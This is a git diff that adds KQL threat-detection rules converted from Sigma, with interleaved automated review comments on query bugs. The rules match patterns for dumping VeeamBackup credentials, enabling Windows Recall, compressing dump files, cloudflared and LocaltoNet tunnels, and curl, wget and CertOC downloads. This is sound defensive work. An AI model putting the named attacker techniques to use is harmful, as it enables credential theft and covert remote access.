+| where (ProcessCommandLine contains "BackupRepositories" or ProcessCommandLine contains "Backups" or ProcessCommandLine contains "Credentials" or ProcessCommandLine contains "HostCreds" or ProcessCommandLine contains "SmbFileShares" or ProcessCommandLine contains "Ssh_creds" or ProcessCommandLine contains "VSphereInfo") and ((ProcessCommandLine contains "VeeamBackup" and ProcessCommandLine contains "From ") and FolderPath endswith "\\sqlcmd.exe")
\ No newline at end of file
diff --git a/KQL/rules/Collection/veeambackup_database_credentials_dump_via_sqlcmd_exe.kql b/KQL/rules/Collection/veeambackup_database_credentials_dump_via_sqlcmd_exe.kql
new file mode 100644
index 00000000..6318e563
--- /dev/null
+++ b/KQL/rules/Collection/veeambackup_database_credentials_dump_via_sqlcmd_exe.kql
@@ -0,0 +1,10 @@
+// Title: VeeamBackup Database Credentials Dump Via Sqlcmd.EXE
+// Author: frack113
+// Date: 2021-12-20
+// Level: high
+// Description: Detects dump of credentials in VeeamBackup dbo
+// MITRE Tactic: Collection
+// Tags: attack.collection, attack.t1005
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "SELECT" and ProcessCommandLine contains "TOP" and ProcessCommandLine contains "[VeeamBackup].[dbo].[Credentials]") and FolderPath endswith "\\sqlcmd.exe"
\ No newline at end of file
diff --git a/KQL/rules/Collection/windows_recall_feature_enabled_disableaidataanalysis_value_deleted.kql b/KQL/rules/Collection/windows_recall_feature_enabled_disableaidataanalysis_value_deleted.kql
new file mode 100644
index 00000000..755a8f4f
--- /dev/null
+++ b/KQL/rules/Collection/windows_recall_feature_enabled_disableaidataanalysis_value_deleted.kql
@@ -0,0 +1,15 @@
+// Title: Windows Recall Feature Enabled - DisableAIDataAnalysis Value Deleted
+// Author: Sajid Nawaz Khan
+// Date: 2024-06-02
+// Level: medium
+// Description: Detects the enabling of the Windows Recall feature via registry manipulation. Windows Recall can be enabled by deleting the existing "DisableAIDataAnalysis" registry value.
+Adversaries may enable Windows Recall as part of post-exploitation discovery and collection activities.
+This rule assumes that Recall is already explicitly disabled on the host, and subsequently enabled by the adversary.
+
+// MITRE Tactic: Collection
+// Tags: attack.collection, attack.t1113
+// False Positives:
+// - Legitimate use/activation of Windows Recall
+
+DeviceRegistryEvents
+| where ActionType =~ "DeleteValue" and RegistryKey endswith "\\Microsoft\\Windows\\WindowsAI\\DisableAIDataAnalysis"
\ No newline at end of file
diff --git a/KQL/rules/Collection/windows_recall_feature_enabled_registry.kql b/KQL/rules/Collection/windows_recall_feature_enabled_registry.kql
new file mode 100644
index 00000000..8ee5e5af
--- /dev/null
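Review bot: `ActionType =~ "DeleteValue"` is the Sysmon EventType name; DeviceRegistryEvents reports a value deletion as `ActionType == "RegistryValueDeleted"`, so as written the Recall value-deleted rule never fires. With that fixed, the key comparison should also stop at the key and test the value name separately, `RegistryKey endswith "\\Microsoft\\Windows\\WindowsAI" and RegistryValueName =~ "DisableAIDataAnalysis"`, because the value name is not part of RegistryKey in this table. A comment above the `where` naming the source field mapping (`// Sysmon EventType=DeleteValue -> MDE ActionType=RegistryValueDeleted`) would stop this recurring in later conversions.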
+++ b/KQL/rules/Collection/windows_recall_feature_enabled_registry.kql
@@ -0,0 +1,15 @@
+// Title: Windows Recall Feature Enabled - Registry
+// Author: Sajid Nawaz Khan
+// Date: 2024-06-02
+// Level: medium
+// Description: Detects the enabling of the Windows Recall feature via registry manipulation. Windows Recall can be enabled by setting the value of "DisableAIDataAnalysis" to "0".
+Adversaries may enable Windows Recall as part of post-exploitation discovery and collection activities.
+This rule assumes that Recall is already explicitly disabled on the host, and subsequently enabled by the adversary.
+
+// MITRE Tactic: Collection
+// Tags: attack.collection, attack.t1113
+// False Positives:
+// - Legitimate use/activation of Windows Recall
+
+DeviceRegistryEvents
+| where RegistryValueData =~ "DWORD (0x00000000)" and RegistryKey endswith "\\Software\\Policies\\Microsoft\\Windows\\WindowsAI\\DisableAIDataAnalysis"
\ No newline at end of file
diff --git a/KQL/rules/Collection/windows_recall_feature_enabled_via_reg_exe.kql b/KQL/rules/Collection/windows_recall_feature_enabled_via_reg_exe.kql
new file mode 100644
index 00000000..56b912eb
--- /dev/null
+++ b/KQL/rules/Collection/windows_recall_feature_enabled_via_reg_exe.kql
@@ -0,0 +1,16 @@
+// Title: Windows Recall Feature Enabled Via Reg.EXE
+// Author: Sajid Nawaz Khan
+// Date: 2024-06-02
+// Level: medium
+// Description: Detects the enabling of the Windows Recall feature via registry manipulation.
+Windows Recall can be enabled by deleting the existing "DisableAIDataAnalysis" value, or setting it to 0.
+Adversaries may enable Windows Recall as part of post-exploitation discovery and collection activities.
+This rule assumes that Recall is already explicitly disabled on the host, and subsequently enabled by the adversary.
+
+// MITRE Tactic: Collection
+// Tags: attack.collection, attack.t1113
+// False Positives:
+// - Legitimate use/activation of Windows Recall
+
+DeviceProcessEvents
+| where (FolderPath endswith "\\reg.exe" or ProcessVersionInfoOriginalFileName =~ "reg.exe") and (ProcessCommandLine contains "Microsoft\\Windows\\WindowsAI" and ProcessCommandLine contains "DisableAIDataAnalysis") and ((ProcessCommandLine contains "add" or ProcessCommandLine contains "0") or ProcessCommandLine contains "delete")
\ No newline at end of file
diff --git a/KQL/rules/Collection/winrar_compressing_dump_files.kql b/KQL/rules/Collection/winrar_compressing_dump_files.kql
new file mode 100644
index 00000000..a62b7e72
--- /dev/null
+++ b/KQL/rules/Collection/winrar_compressing_dump_files.kql
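Review bot: `((ProcessCommandLine contains "add" or ProcessCommandLine contains "0") or ProcessCommandLine contains "delete")` cannot tell enabling Recall from disabling it: any `reg add` touching DisableAIDataAnalysis matches, including a write that sets the value to 1, and `contains "0"` on its own is satisfied by almost any command line. The description says the value is deleted or set to 0, so the `or` between `add` and `0` looks like a `contains|all` lost in conversion; the grouping that matches the description is `((ProcessCommandLine contains "add" and ProcessCommandLine contains "0") or ProcessCommandLine contains "delete")`. If the looser form is intentional, say so in a comment above the `where`, since the rule's level and description promise the narrower behaviour.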
@@ -0,0 +1,13 @@
+// Title: Winrar Compressing Dump Files
+// Author: Florian Roth (Nextron Systems)
+// Date: 2022-01-04
+// Level: medium
+// Description: Detects execution of WinRAR in order to compress a file with a ".dmp"/".dump" extension, which could be a step in a process of dump file exfiltration.
+// MITRE Tactic: Collection
+// Tags: attack.collection, attack.t1560.001
+// False Positives:
+// - Legitimate use of WinRAR with a command line in which ".dmp" or ".dump" appears accidentally
+// - Legitimate use of WinRAR to compress WER ".dmp" files for troubleshooting
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains ".dmp" or ProcessCommandLine contains ".dump" or ProcessCommandLine contains ".hdmp") and ((FolderPath endswith "\\rar.exe" or FolderPath endswith "\\winrar.exe") or ProcessVersionInfoFileDescription =~ "Command line RAR")
\ No newline at end of file
diff --git a/KQL/rules/Collection/winrar_execution_in_non_standard_folder.kql b/KQL/rules/Collection/winrar_execution_in_non_standard_folder.kql
new file mode 100644
index 00000000..1f8fb505
--- /dev/null
+++ b/KQL/rules/Collection/winrar_execution_in_non_standard_folder.kql
@@ -0,0 +1,12 @@
+// Title: WinRAR Execution in Non-Standard Folder
+// Author: Florian Roth (Nextron Systems), Tigzy
+// Date: 2021-11-17
+// Level: medium
+// Description: Detects a suspicious WinRAR execution in a folder which is not the default installation folder
+// MITRE Tactic: Collection
+// Tags: attack.collection, attack.t1560.001
+// False Positives:
+// - Legitimate use of WinRAR in a folder of a software that bundles WinRAR
+
+DeviceProcessEvents
+| where ((FolderPath endswith "\\rar.exe" or FolderPath endswith "\\winrar.exe") or (ProcessVersionInfoFileDescription in~ ("Command line RAR", "WinRAR"))) and (not(((FolderPath contains ":\\Program Files (x86)\\WinRAR\\" or FolderPath contains ":\\Program Files\\WinRAR\\") or FolderPath endswith "\\UnRAR.exe"))) and (not(FolderPath contains ":\\Windows\\Temp\\"))
\ No newline at end of file
diff --git a/KQL/rules/Command and Control/adsi_cache_file_creation_by_uncommon_tool.kql b/KQL/rules/Command and Control/adsi_cache_file_creation_by_uncommon_tool.kql
new file mode 100644
index 00000000..cba2f4eb
--- /dev/null
+++ b/KQL/rules/Command and Control/adsi_cache_file_creation_by_uncommon_tool.kql
@@ -0,0 +1,12 @@
+// Title: ADSI-Cache File Creation By Uncommon Tool
+// Author: xknow @xknow_infosec, Tim Shelton
+// Date: 2019-03-24
+// Level: medium
+// Description: Detects the creation of an "Active Directory Schema Cache File" (.sch) file by an uncommon tool.
+// MITRE Tactic: Command and Control
+// Tags: attack.t1001.003, attack.command-and-control
+// False Positives:
+// - Other legimate tools, which do ADSI (LDAP) operations, e.g. any remoting activity by MMC, Powershell, Windows etc.
+
+DeviceFileEvents
+| where (FolderPath contains "\\Local\\Microsoft\\Windows\\SchCache\\" and FolderPath endswith ".sch") and (not((((InitiatingProcessFolderPath endswith ":\\Program Files\\Cylance\\Desktop\\CylanceSvc.exe" or InitiatingProcessFolderPath endswith ":\\Windows\\CCM\\CcmExec.exe" or InitiatingProcessFolderPath endswith ":\\windows\\system32\\dllhost.exe" or InitiatingProcessFolderPath endswith ":\\Windows\\system32\\dsac.exe" or InitiatingProcessFolderPath endswith ":\\Windows\\system32\\efsui.exe" or InitiatingProcessFolderPath endswith ":\\windows\\system32\\mmc.exe" or InitiatingProcessFolderPath endswith ":\\windows\\system32\\svchost.exe" or InitiatingProcessFolderPath endswith ":\\Windows\\System32\\wbem\\WmiPrvSE.exe" or InitiatingProcessFolderPath endswith ":\\windows\\system32\\WindowsPowerShell\\v1.0\\powershell.exe") or (InitiatingProcessFolderPath contains ":\\Windows\\ccmsetup\\autoupgrade\\ccmsetup" or InitiatingProcessFolderPath contains ":\\Program Files\\SentinelOne\\Sentinel Agent")) or ((InitiatingProcessFolderPath contains ":\\Program Files\\" and InitiatingProcessFolderPath contains "\\Microsoft Office") and InitiatingProcessFolderPath endswith "\\OUTLOOK.EXE")))) and (not((InitiatingProcessFolderPath endswith ":\\Program Files\\Citrix\\Receiver StoreFront\\Services\\DefaultDomainServices\\Citrix.DeliveryServices.DomainServices.ServiceHost.exe" or InitiatingProcessFolderPath endswith "\\LANDesk\\LDCLient\\ldapwhoami.exe")))
\ No newline at end of file
diff --git a/KQL/rules/Command and Control/anydesk_temporary_artefact.kql b/KQL/rules/Command and Control/anydesk_temporary_artefact.kql
new file mode 100644
index 00000000..11daf9c7
--- /dev/null
+++ b/KQL/rules/Command and Control/anydesk_temporary_artefact.kql
@@ -0,0 +1,15 @@
+// Title: Anydesk Temporary Artefact
+// Author: frack113
+// Date: 2022-02-11
+// Level: medium
+// Description: An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.
+These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.
+Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)
+
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.t1219.002
+// False Positives:
+// - Legitimate use
+
+DeviceFileEvents
+| where FolderPath contains "\\AppData\\Roaming\\AnyDesk\\user.conf" or FolderPath contains "\\AppData\\Roaming\\AnyDesk\\system.conf"
\ No newline at end of file
diff --git a/KQL/rules/Command and Control/arbitrary_file_download_via_gfxdownloadwrapper_exe.kql b/KQL/rules/Command and Control/arbitrary_file_download_via_gfxdownloadwrapper_exe.kql
new file mode 100644
index 00000000..a91eace5
--- /dev/null
+++ b/KQL/rules/Command and Control/arbitrary_file_download_via_gfxdownloadwrapper_exe.kql
@@ -0,0 +1,10 @@
+// Title: Arbitrary File Download Via GfxDownloadWrapper.EXE
+// Author: Victor Sergeev, oscd.community
+// Date: 2020-10-09
+// Level: medium
+// Description: Detects execution of GfxDownloadWrapper.exe with a URL as an argument to download file.
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.t1105
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains "http://" or ProcessCommandLine contains "https://") and FolderPath endswith "\\GfxDownloadWrapper.exe") and (not(ProcessCommandLine contains "https://gameplayapi.intel.com/"))
\ No newline at end of file
diff --git a/KQL/rules/Command and Control/cloudflared_portable_execution.kql b/KQL/rules/Command and Control/cloudflared_portable_execution.kql
new file mode 100644
index 00000000..7328340e
--- /dev/null
+++ b/KQL/rules/Command and Control/cloudflared_portable_execution.kql
@@ -0,0 +1,13 @@
+// Title: Cloudflared Portable Execution
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-12-20
+// Level: medium
+// Description: Detects the execution of the "cloudflared" binary from a non standard location.
+
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.t1090.001
+// False Positives:
+// - Legitimate usage of Cloudflared portable versions
+
+DeviceProcessEvents
+| where FolderPath endswith "\\cloudflared.exe" and (not((FolderPath contains ":\\Program Files (x86)\\cloudflared\\" or FolderPath contains ":\\Program Files\\cloudflared\\")))
\ No newline at end of file
diff --git a/KQL/rules/Command and Control/cloudflared_quick_tunnel_execution.kql b/KQL/rules/Command and Control/cloudflared_quick_tunnel_execution.kql
new file mode 100644
index 00000000..ee525a83
--- /dev/null
+++ b/KQL/rules/Command and Control/cloudflared_quick_tunnel_execution.kql
@@ -0,0 +1,15 @@
+// Title: Cloudflared Quick Tunnel Execution
+// Author: Sajid Nawaz Khan
+// Date: 2023-12-20
+// Level: medium
+// Description: Detects creation of an ad-hoc Cloudflare Quick Tunnel, which can be used to tunnel local services such as HTTP, RDP, SSH and SMB.
+The free TryCloudflare Quick Tunnel will generate a random subdomain on trycloudflare[.]com, following a call to api[.]trycloudflare[.]com.
+The tool has been observed in use by threat groups including Akira ransomware.
+
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.t1090.001
+// False Positives:
+// - Legitimate usage of Cloudflare Quick Tunnel
+
+DeviceProcessEvents
+| where (((FolderPath endswith "\\cloudflared.exe" or FolderPath endswith "\\cloudflared-windows-386.exe" or FolderPath endswith "\\cloudflared-windows-amd64.exe") or (SHA256 startswith "2fb6c04c4f95fb8d158af94c137f90ac820716deaf88d8ebec956254e046cb29" or SHA256 startswith "b3d21940a10fdef5e415ad70331ce257c24fe3bcf7722262302e0421791f87e8" or SHA256 startswith "1fbd8362b2d2d2e6a5750ae3db69cd1815e6c1d31da48a98b796450971a8e039" or SHA256 startswith "0409c9b12f9d0eda86e461ed9bdabeefb00172b26322079681a0bdf48e68dc28" or SHA256 startswith "7cfb411d04bac42ef93d1f0c93c0a481e38c6f4612b97ae89d4702595988edc7" or SHA256 startswith "5b3c2d846ab162dc6bc595cce3a49de5731afde5d6060be7066d21b013a28373" or SHA256 startswith "ce95df7f69664c3df19b76028e115931919a71517b776da7b42d353e2ff4a670" or SHA256 startswith "1293525a19cfe3bc8296b62fbfe19f083632ed644a1c18c10b045a1d3030d81a" or SHA256 startswith "af2b9161cfcb654b16408cd6b098afe9d1fb61a037d18d7090a119d4c0c8e0f0" or SHA256 startswith "39ddceb56a15798826a5fc4892fa2b474c444bb4d7a8bf2fa95e41cab10fa7a1" or SHA256 startswith "ccd11f2328023a0e7929e845d5b6e7bc783fb4650d65faef3ae090239d4bbce2" or SHA256 startswith "b6e5c5d2567ae8c69cc012ebcae30e6c9b5359d64a58d17ba75ec89f8bce71ac" or SHA256 startswith "f813484ea441404f18caad96f28138e8aaf0cb256163c09c2ab8a3acab87f69f" or SHA256 startswith "fc4a0802ab9c7409b892ca00636bec61e2acfc911bccfdeb9978b8ab5a2f828d" or SHA256 startswith "083150724b49604c8765c1ba19541fa260b133be0acb0647fcd936d81f054499" or SHA256 startswith "44303d6572956f28a0f2e4b188934fb9874f2584f5c81fa431a463cfbf28083b" or SHA256 startswith "5d38c46032a58e28ae5f7d174d8761ec3d64d186677f3ec53af5f51afb9bfd2f" or SHA256 startswith "e1e70fa42059911bc6685fafef957f9a73fc66f214d0704a9b932683a5204032" or SHA256 startswith "c01356092a365b84f84f0e66870bd1a05ba3feb53cafd973fa5fea2534bee234" or SHA256 startswith "b3f9c06151e30ee43d39e788a79cd918a314f24e04fe87f3de8272a2057b624f" or SHA256 startswith "cd81b2792f0739f473c31c9cb7cf2313154bfa28b839975802b90e8790bb5058" or SHA256 startswith "9ec7e6c8e1bfd883663d8d9d62c9e4f9ae373b731407181e32491b27a7218a2c" or SHA256 startswith "c2cfd23fdc6c0e1b1ffa0e545cbe556f18d11b362b4a89ba0713f6ab01c4827f" or SHA256 startswith "53f8adbd76c0eb16f5e43cadde422474d8a06f9c8f959389c1930042ad8beaa5" or SHA256 startswith "648c8d2f8001c113d2986dd00b7bbd181593d462bef73522cee212c4f71f95b3" or SHA256 startswith "ae047e2095e46c3f9c518b2be67ec753f4f0aad23b261a361fcb6144dcdb63b4" or SHA256 startswith "3153d2baa462978dd22ab33d1c2274ecc88c200225d6a3327f98d5b752d08f5c" or SHA256 startswith "f49cde976e628012c9db73e1c8d76081944ecf2297cdafeb78bb13290da274c4" or SHA256 startswith "d2513e58bb03ccc83affde685c6ef987924c37ce6707d8e9857e2524b0d7e90f" or SHA256 startswith "bb67c7623ba92fe64ffd9816b8d5b3b1ea3013960a30bd4cf6e295b3eb5b1bad" or SHA256 startswith "b34b3c3a91e3165d1481f0b3ec23eab93a1cfba94345a6cbfe5b18ddbd48eac7" or SHA256 startswith "f7848034e010d55f15e474ca998f96391e320ff29b00cfcc4c5e536529703e75" or SHA256 startswith "b6fc9493778cbe3bfc062d73f5cc604bc0ff058bc5e5dc6aac87f3a4008b54b6" or SHA256 startswith "f5c5e962577e2293c4ad10603816dce7cc273585969615fbf4e4bfa9eaff1688" or SHA256 startswith "d14c52d9220b606f428a8fe9f7c108b0d6f14cf71e7384749e98e6a95962e68f" or SHA256 startswith "d3a0e1a79158f3985cd49607ebe0cdfcc49cb9af96b8f43aefd0cdfe2f22e663" or SHA256 startswith "2fbbfc8299537ff80cadf9d0e27c223fe0ccb9052bf9d8763ad717bbfa521c77" or SHA256 startswith "19074674c6fbdaa573b3081745e5e26144fdf7a086d14e0e220d1814f1f13078")) and ((ProcessCommandLine contains "-url" and ProcessCommandLine contains "tunnel") or (ProcessCommandLine contains ".exe -url" or ProcessCommandLine contains ".exe --url"))) or (ProcessCommandLine contains "-url" and ProcessCommandLine contains "-no-autoupdate")
\ No newline at end of file
diff --git a/KQL/rules/Command and Control/cloudflared_tunnel_connections_cleanup.kql b/KQL/rules/Command and Control/cloudflared_tunnel_connections_cleanup.kql
new file mode 100644
index 00000000..a3a203ff
--- /dev/null
+++ b/KQL/rules/Command and Control/cloudflared_tunnel_connections_cleanup.kql
@@ -0,0 +1,12 @@
+// Title: Cloudflared Tunnel Connections Cleanup
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-05-17
+// Level: medium
+// Description: Detects execution of the "cloudflared" tool with the tunnel "cleanup" flag in order to cleanup tunnel connections.
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.t1102, attack.t1090, attack.t1572
+// False Positives:
+// - Legitimate usage of Cloudflared.
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "-config " or ProcessCommandLine contains "-connector-id ") and (ProcessCommandLine contains " tunnel " and ProcessCommandLine contains "cleanup ")
\ No newline at end of file
diff --git a/KQL/rules/Command and Control/cloudflared_tunnel_execution.kql b/KQL/rules/Command and Control/cloudflared_tunnel_execution.kql
new file mode 100644
index 00000000..391c60ba
--- /dev/null
+++ b/KQL/rules/Command and Control/cloudflared_tunnel_execution.kql
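Review bot: The 38 `SHA256 startswith "<full 64-hex hash>"` clauses compare a complete digest with a prefix operator; `SHA256 in~ ("2fb6c04c…", …)` states the intent, is cheaper to evaluate, and keeps the hash set editable as a list rather than a chain of `or`. The trailing `or (ProcessCommandLine contains "-url" and ProcessCommandLine contains "-no-autoupdate")` sits outside the image/hash gate, so any process whose command line carries those two tokens matches regardless of which binary ran — if the source rule bound that selection to the cloudflared image the closing parenthesis is misplaced, and if it is deliberate a comment above the `where` saying so would save the next reader the same question.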
@@ -0,0 +1,12 @@
+// Title: Cloudflared Tunnel Execution
+// Author: Janantha Marasinghe, Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-05-17
+// Level: medium
+// Description: Detects execution of the "cloudflared" tool to connect back to a tunnel. This was seen used by threat actors to maintain persistence and remote access to compromised networks.
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.t1102, attack.t1090, attack.t1572
+// False Positives:
+// - Legitimate usage of Cloudflared tunnel.
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "-config " or ProcessCommandLine contains "-credentials-contents " or ProcessCommandLine contains "-credentials-file " or ProcessCommandLine contains "-token ") and (ProcessCommandLine contains " tunnel " and ProcessCommandLine contains " run ")
\ No newline at end of file
diff --git a/KQL/rules/Command and Control/communication_to_localtonet_tunneling_service_initiated.kql b/KQL/rules/Command and Control/communication_to_localtonet_tunneling_service_initiated.kql
new file mode 100644
index 00000000..b19e54ae
--- /dev/null
+++ b/KQL/rules/Command and Control/communication_to_localtonet_tunneling_service_initiated.kql
@@ -0,0 +1,15 @@ +// Title: Communication To LocaltoNet Tunneling Service Initiated +// Author: Andreas Braathen (mnemonic.io) +// Date: 2024-06-17 +// Level: high +// Description: Detects an executable initiating a network connection to "LocaltoNet" tunneling sub-domains. +LocaltoNet is a reverse proxy that enables localhost services to be exposed to the Internet. +Attackers have been seen to use this service for command-and-control activities to bypass MFA and perimeter controls. + +// MITRE Tactic: Command and Control +// Tags: attack.command-and-control, attack.t1572, attack.t1090, attack.t1102 +// False Positives: +// - Legitimate use of the LocaltoNet service. + +DeviceNetworkEvents +| where RemoteUrl endswith ".localto.net" or RemoteUrl endswith ".localtonet.com" \ No newline at end of file diff --git a/KQL/rules/Command and Control/communication_to_localtonet_tunneling_service_initiated_linux.kql b/KQL/rules/Command and Control/communication_to_localtonet_tunneling_service_initiated_linux.kql new file mode 100644 index 00000000..b77e3af2 --- /dev/null +++ b/KQL/rules/Command and Control/communication_to_localtonet_tunneling_service_initiated_linux.kql @@ -0,0 +1,15 @@ +// Title: Communication To LocaltoNet Tunneling Service Initiated - Linux +// Author: Andreas Braathen (mnemonic.io) +// Date: 2024-06-17 +// Level: high +// Description: Detects an executable initiating a network connection to "LocaltoNet" tunneling sub-domains. +LocaltoNet is a reverse proxy that enables localhost services to be exposed to the Internet. +Attackers have been seen to use this service for command-and-control activities to bypass MFA and perimeter controls. + +// MITRE Tactic: Command and Control +// Tags: attack.command-and-control, attack.t1572, attack.t1090, attack.t1102 +// False Positives: +// - Legitimate use of the LocaltoNet service. + +DeviceNetworkEvents +| where RemoteUrl endswith ".localto.net" or RemoteUrl endswith ".localtonet.com" \ No newline at end of file 
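Review bot: The description continuation lines `+LocaltoNet is a reverse proxy …` and `+Attackers have been seen …` carry no `//` prefix, so they are not comments and the query text begins with the bare identifier `LocaltoNet`, which will fail to parse when the file is pasted into Advanced Hunting. Every multi-line Sigma description converted in this batch shows the same pattern (the Linux twin on this same line, and the finger, GoToAssist and OneDrive rules further down), so the fix belongs in the converter's header emitter: prefix each continuation line, `// LocaltoNet is a reverse proxy that enables localhost services to be exposed to the Internet.` The two LocaltoNet rules are otherwise identical apart from their titles; if the Linux variant is meant to be distinct it needs a platform predicate, otherwise one file would do.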
diff --git a/KQL/rules/Command and Control/curl_usage_on_linux.kql b/KQL/rules/Command and Control/curl_usage_on_linux.kql
new file mode 100644
index 00000000..ea57bd5a
--- /dev/null
+++ b/KQL/rules/Command and Control/curl_usage_on_linux.kql
@@ -0,0 +1,13 @@
+// Title: Curl Usage on Linux
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-09-15
+// Level: low
+// Description: Detects a curl process start on linux, which indicates a file download from a remote location or a simple web request to a remote server
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.t1105
+// False Positives:
+// - Scripts created by developers and admins
+// - Administrative activity
+
+DeviceProcessEvents
+| where FolderPath endswith "/curl"
\ No newline at end of file
diff --git a/KQL/rules/Command and Control/download_file_to_potentially_suspicious_directory_via_wget.kql b/KQL/rules/Command and Control/download_file_to_potentially_suspicious_directory_via_wget.kql
new file mode 100644
index 00000000..f6aa8597
--- /dev/null
+++ b/KQL/rules/Command and Control/download_file_to_potentially_suspicious_directory_via_wget.kql
@@ -0,0 +1,10 @@
+// Title: Download File To Potentially Suspicious Directory Via Wget
+// Author: Joseliyo Sanchez, @Joseliyo_Jstnk
+// Date: 2023-06-02
+// Level: medium
+// Description: Detects the use of wget to download content to a suspicious directory
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.t1105
+
+DeviceProcessEvents
+| where FolderPath endswith "/wget" and (ProcessCommandLine matches regex "\\s-O\\s" or ProcessCommandLine contains "--output-document") and ProcessCommandLine contains "/tmp/"
\ No newline at end of file
diff --git a/KQL/rules/Command and Control/file_download_and_execution_via_ieexec_exe.kql b/KQL/rules/Command and Control/file_download_and_execution_via_ieexec_exe.kql
new file mode 100644
index 00000000..90a1fc9b
--- /dev/null
+++ b/KQL/rules/Command and Control/file_download_and_execution_via_ieexec_exe.kql
@@ -0,0 +1,10 @@
+// Title: File Download And Execution Via IEExec.EXE
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-05-16
+// Level: high
+// Description: Detects execution of the IEExec utility to download and execute files
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.t1105
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "http://" or ProcessCommandLine contains "https://") and (FolderPath endswith "\\IEExec.exe" or ProcessVersionInfoOriginalFileName =~ "IEExec.exe")
\ No newline at end of file
diff --git a/KQL/rules/Command and Control/file_download_from_browser_process_via_inline_url.kql b/KQL/rules/Command and Control/file_download_from_browser_process_via_inline_url.kql
new file mode 100644
index 00000000..181b3812
--- /dev/null
+++ b/KQL/rules/Command and Control/file_download_from_browser_process_via_inline_url.kql
@@ -0,0 +1,10 @@ +// Title: File Download From Browser Process Via Inline URL +// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-01-11 +// Level: medium +// Description: Detects execution of a browser process with a URL argument pointing to a file with a potentially interesting extension. This can be abused to download arbitrary files or to hide from the user for example by launching the browser in a minimized state. +// MITRE Tactic: Command and Control +// Tags: attack.command-and-control, attack.t1105 + +DeviceProcessEvents +| where (ProcessCommandLine endswith ".7z" or ProcessCommandLine endswith ".dat" or ProcessCommandLine endswith ".dll" or ProcessCommandLine endswith ".exe" or ProcessCommandLine endswith ".hta" or ProcessCommandLine endswith ".ps1" or ProcessCommandLine endswith ".psm1" or ProcessCommandLine endswith ".txt" or ProcessCommandLine endswith ".vbe" or ProcessCommandLine endswith ".vbs" or ProcessCommandLine endswith ".zip") and ProcessCommandLine contains "http" and (FolderPath endswith "\\brave.exe" or FolderPath endswith "\\chrome.exe" or FolderPath endswith "\\msedge.exe" or FolderPath endswith "\\opera.exe" or FolderPath endswith "\\vivaldi.exe") \ No newline at end of file diff --git a/KQL/rules/Command and Control/file_download_from_ip_based_url_via_certoc_exe.kql b/KQL/rules/Command and Control/file_download_from_ip_based_url_via_certoc_exe.kql new file mode 100644 index 00000000..cdcad4ed --- /dev/null +++ b/KQL/rules/Command and Control/file_download_from_ip_based_url_via_certoc_exe.kql 
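Review bot: The `ProcessCommandLine endswith ".exe"` family of tests assumes the URL is the last token and unquoted; a browser started with a quoted argument (`chrome.exe "http://x/a.exe"`) ends in `.exe"` and is missed, as is any URL followed by a query string or fragment. A regex anchored on the extension with an optional closing quote is tighter and keeps the list in one place: `ProcessCommandLine matches regex @"(?i)\.(7z|dat|dll|exe|hta|ps1|psm1|txt|vbe|vbs|zip)""?\s*$"` (`(?i)` because `endswith` was case-insensitive and RE2 is not). The `contains "http"` guard can stay as the cheap pre-filter.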
@@ -0,0 +1,10 @@ +// Title: File Download From IP Based URL Via CertOC.EXE +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-10-18 +// Level: high +// Description: Detects when a user downloads a file from an IP based URL using CertOC.exe +// MITRE Tactic: Command and Control +// Tags: attack.command-and-control, attack.execution, attack.t1105 + +DeviceProcessEvents +| where ProcessCommandLine contains "-GetCACAPS" and (FolderPath endswith "\\certoc.exe" or ProcessVersionInfoOriginalFileName =~ "CertOC.exe") and ProcessCommandLine matches regex "://[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}" \ No newline at end of file diff --git a/KQL/rules/Command and Control/file_download_using_notepad_gup_utility.kql b/KQL/rules/Command and Control/file_download_using_notepad_gup_utility.kql new file mode 100644 index 00000000..63dcdf7c --- /dev/null +++ b/KQL/rules/Command and Control/file_download_using_notepad_gup_utility.kql @@ -0,0 +1,12 @@ +// Title: File Download Using Notepad++ GUP Utility +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-06-10 +// Level: high +// Description: Detects execution of the Notepad++ updater (gup) from a process other than Notepad++ to download files. +// MITRE Tactic: Command and Control +// Tags: attack.command-and-control, attack.t1105 +// False Positives: +// - Other parent processes other than notepad++ using GUP that are not currently identified + +DeviceProcessEvents +| where ((ProcessCommandLine contains " -unzipTo " and ProcessCommandLine contains "http") and (FolderPath endswith "\\GUP.exe" or ProcessVersionInfoOriginalFileName =~ "gup.exe")) and (not(InitiatingProcessFolderPath endswith "\\notepad++.exe")) \ No newline at end of file diff --git a/KQL/rules/Command and Control/file_download_via_certoc_exe.kql b/KQL/rules/Command and Control/file_download_via_certoc_exe.kql new file mode 100644 index 00000000..21f6ab16 --- /dev/null 
+++ b/KQL/rules/Command and Control/file_download_via_certoc_exe.kql
@@ -0,0 +1,10 @@
+// Title: File Download via CertOC.EXE
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-05-16
+// Level: medium
